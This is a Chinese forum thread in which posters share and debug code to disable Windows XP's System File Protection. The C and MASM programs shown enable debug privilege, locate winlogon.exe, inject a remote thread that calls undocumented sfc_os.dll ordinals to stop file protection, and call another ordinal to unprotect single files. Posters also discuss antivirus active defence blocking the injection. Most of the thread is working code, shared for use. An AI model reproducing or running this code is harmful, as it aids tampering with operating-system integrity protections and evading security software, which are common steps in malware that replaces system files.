能力值:
( LV12,RANK:1010 )
2 楼
汗,找的代码都不全。 注入Winlogon要提升权限的。
这个远程线程不好使,直接调用sfc_os.dll的5号函数就可以了.
#include <windows.h>
#include <assert.h>
#include <stdio.h>
typedef DWORD (* SFPEXC)(DWORD, wchar_t *, DWORD);
void wmain(int argc, wchar_t **argv)
{
HMODULE sfc_os;
SFPEXC sfp_exc;
assert(argc==2);
assert(sfc_os=LoadLibrary("sfc_os.dll"));
assert(sfp_exc=(SFPEXC) GetProcAddress(sfc_os, (char *) 5));
assert(!sfp_exc(0, argv[1], -1));
wprintf(L"File %s should now be unprotected for 1 minute", argv[1]);
}
能力值:
( LV2,RANK:10 )
3 楼
学习了!!!
能力值:
( LV13,RANK:1050 )
4 楼
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Shlwapi.h>
#include <sfc.h>
#include <stdlib.h>
#include <stdio.h>
#include <iostream>
#include <tlhelp32.h>
#pragma comment(lib,"sfc.lib")
#pragma comment(lib,"shlwapi.lib") #pragma check_stack (off)
DWORD thread_func (FARPROC sfc_terminate)
{
sfc_terminate();
return 0;
}
void after_thread_func(void)
{
}
#pragma check_stack
//调整权限
int AdjustPrivileges(void)
{
HANDLE token_handle;
int ret=0;
if(OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &token_handle))
{
LUID luid;
if(LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid))
{
TOKEN_PRIVILEGES tk_priv;
tk_priv.PrivilegeCount=1;
tk_priv.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
tk_priv.Privileges[0].Luid=luid;
if(AdjustTokenPrivileges(token_handle,FALSE,&tk_priv,0,NULL,NULL)) ret=1;
}
CloseHandle(token_handle);
}
return ret;
}
//根据取得进程号
DWORD GetProcessID(const char* pname)
{
HANDLE hProcessSnap = NULL;
DWORD bRet = 0;
PROCESSENTRY32 pe32 = {0};
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hProcessSnap, &pe32))
{
do
{
if (stricmp(pe32.szExeFile, pname) == 0) {
bRet = pe32.th32ProcessID;
break;
}
}while (Process32Next(hProcessSnap, &pe32));
}
CloseHandle (hProcessSnap);
return (bRet);
}
//关闭windows文件保护
void TerminateSfc()
{
DWORD wpid = 0;
wpid = GetProcessID("winlogon.exe");
HANDLE remote_thread;
HMODULE sfc=LoadLibrary("SFC_OS.DLL");
FARPROC sfc_terminate=GetProcAddress(sfc, (char *) 2);
if (!AdjustPrivileges()) {
MessageBox(NULL, "调整权限错误", "", MB_OK);
exit(0);
}
HANDLE process=OpenProcess(PROCESS_ALL_ACCESS, FALSE, wpid);
if(!process)
{
exit(0);
}
LPVOID remote_mem=VirtualAllocEx(process,NULL,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),MEM_COMMIT,PAGE_READWRITE);
if(!remote_mem)
{
printf("Error while commiting memory in the remote process\n");
goto clean_up;
}
if(!WriteProcessMemory(process,remote_mem,(char *) thread_func,(SIZE_T) ((char *)after_thread_func-(char *)thread_func),(SIZE_T *) 0))
{
printf("Error %d while writing to the remote process\n", GetLastError());
goto clean_up;
}
remote_thread=CreateRemoteThread(process,NULL,0,(LPTHREAD_START_ROUTINE) remote_mem,(LPVOID) sfc_terminate,0,NULL);
if(!remote_thread)
{
printf("Error while creating remote thread in the process\n");
goto clean_up;
}
if(WaitForSingleObject(remote_thread, 10*1000)==WAIT_TIMEOUT)
printf("Timeout occured while waiting for the remote thread\n");
CloseHandle(remote_thread);
clean_up:
if(remote_mem) VirtualFreeEx(process, remote_mem, 0, MEM_RELEASE);
CloseHandle(process);
}
能力值:
( LV2,RANK:10 )
5 楼
sudami没看清楚吧,我传的是部分代码.
// 这里是提升Debug权限
if(!SetPrivilege(hProcessToken, SE_DEBUG_NAME, TRUE))
{
CloseHandle(hProcessToken);
CloseHandle(hMutex);
return FALSE;
}
5号函数我也知道,但只能针对一个文件,真晕~
感谢combojiang的回复, 我也觉得应该是要写入进程内存空间再执行, 但看了不少代码, 有asm的, Delphi的, 也有C++的, 都宣称在XP SP2下调试通过, 但都没有这部分调用.我先试试.再次感谢!
能力值:
( LV2,RANK:10 )
6 楼
看了下,combojiang这样应该能行,我转份我下载的代码,为什么它能测试通过?
关闭SFC[文件保护]的源代码
WindowsXP Professional SP2测试通过.
.386
.Model Flat,StdCall
Option CaseMap :None
Include \Masm32\Include\Windows.inc
Include \Masm32\Include\User32.inc
Include \Masm32\Include\Shell32.inc
Include \Masm32\Include\Kernel32.inc
Include \Masm32\Include\Advapi32.inc
IncludeLib \Masm32\Lib\User32.lib
IncludeLib \Masm32\Lib\Shell32.lib
IncludeLib \Masm32\Lib\Kernel32.lib
IncludeLib \Masm32\Lib\Advapi32.lib
.Data
stProcess db "winlogon.exe",0
.Data?
hFile dd ?
dwProcessID dd ?
hProcess dd ?
lpLoadLibrary dd ?
lpDllName dd ?
szDllPath db 260 dup(?)
szSysPath db 260 dup(?)
hToken dd ?
tkp TOKEN_PRIVILEGES<>
sdnv LUID <>
.Code
EnableDebugPriv Proc
invoke GetCurrentProcess
invoke OpenProcessToken,eax,TOKEN_ADJUST_PRIVILEGES or TOKEN_QUERY,addr hToken
invoke LookupPrivilegeValue,0,CTEXT("SeDebugPrivilege"),addr sdnv
mov tkp.PrivilegeCount,1
m2m tkp.Privileges.Luid.LowPart,sdnv.LowPart
m2m tkp.Privileges.Luid.HighPart,sdnv.HighPart
mov tkp.Privileges.Attributes,SE_PRIVILEGE_ENABLED
invoke AdjustTokenPrivileges,hToken,FALSE,addr tkp,sizeof tkp,0,0
invoke CloseHandle,hToken
ret
EnableDebugPriv EndP
CloseSFC Proc
Local @stProcess:PROCESSENTRY32
Local @hSnapShot
Local @hProcess
Local @hSfc
invoke RtlZeroMemory,addr @stProcess,sizeof @stProcess
mov @stProcess.dwSize,sizeof @stProcess
invoke CreateToolhelp32Snapshot,TH32CS_SNAPPROCESS,0
mov @hSnapShot,eax
invoke Process32First,@hSnapShot,addr @stProcess
.While eax
invoke lstrcmpi,addr @stProcess.szExeFile,addr stProcess
.if eax == 0
invoke OpenProcess,PROCESS_CREATE_THREAD or PROCESS_VM_OPERATION or PROCESS_VM_WRITE,FALSE,@stProcess.th32ProcessID
.if eax
mov @hProcess,eax
invoke LoadLibrary,CTEXT("sfc.dll")
mov @hSfc,eax
invoke GetProcAddress,eax,2
push eax
invoke FreeLibrary,@hSfc
pop eax
.if eax
invoke CreateRemoteThread,@hProcess,0,0,eax,0,0,0
.if eax
invoke CloseHandle,eax
ret
.endif
.endif
.endif
.endif
invoke Process32Next,@hSnapShot,addr @stProcess
.EndW
invoke CloseHandle,@hSnapShot
ret
CloseSFC EndP
Start:
Call EnableDebugPriv
Call CloseSFC
invoke ExitProcess,0
End Start
能力值:
( LV12,RANK:1010 )
7 楼
因为你的代码中木有调用 AdjustTokenPrivileges 去调整权限啊.
远线程不好使, 还没运行就被主防扼杀了~~
能力值:
( LV2,RANK:10 )
8 楼
找到原因了,sudami,不好意思,是我代码上传的不完整.
if(!SetPrivilege(hProcessToken, SE_DEBUG_NAME, TRUE))
{
CloseHandle(hProcessToken);
CloseHandle(hMutex);
return FALSE;
}
SetPrivilege是我自定义的函数,用于调整权限.呵呵:0
能力值:
( LV12,RANK:1010 )
9 楼
哈哈, 外国人写了篇文章,关于sfc的. 5种方法...
其实都差不多.俺把附件传上来吧, 给没有学习的同学一个参考,老技术了啊
上传的附件:
能力值:
( LV2,RANK:10 )
10 楼
哈哈
原来就是杀毒软件的主动防御作怪,亏得sudami的提醒.本来一个简单的东西被搞复杂了.